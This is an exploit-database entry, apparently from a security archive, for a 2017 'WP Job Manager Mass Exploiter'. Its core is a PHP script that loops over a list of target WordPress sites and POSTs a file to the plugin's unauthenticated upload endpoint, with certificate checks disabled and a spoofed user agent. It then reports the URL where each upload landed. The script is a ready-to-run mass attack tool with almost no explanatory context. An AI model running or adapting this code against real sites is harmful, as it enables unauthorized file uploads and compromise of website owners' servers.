WP Job Manager Mass Exploiter

2017.06.06
id AlHikam AM (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<?php $nama = "target.html"; $buka=fopen("$nama","r"); $size=filesize("$nama"); $baca=fread($buka,$size); $sites = explode("\r\n", $baca); foreach($sites as $site){ if(preg_match("#http://#", $site)) { $suu = $site; } else { $suu = "http://".$site; } echo "$suu ->"; $file = "k.png"; $site = "$suu/jm-ajax/upload_file/"; $post = array( "file" => "@$file", ); $ch = curl_init ("$site"); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch, CURLOPT_POST, 1); curl_setopt ($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log'); curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log'); $data6 = curl_exec ($ch); if (preg_match("/$file/i", $data6)){ $save = "$suu/wp-content/uploads/job-manager-uploads/file/2017/06/$file"; echo " \n$save\n"; }else{ echo " \nNo\n"; } } ?>

References:

http://www.indoxploit.or.id/2017/06/auto-exploit-plugin-wp-job-manager.html
https://pastebin.com/hp0jJr1g


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top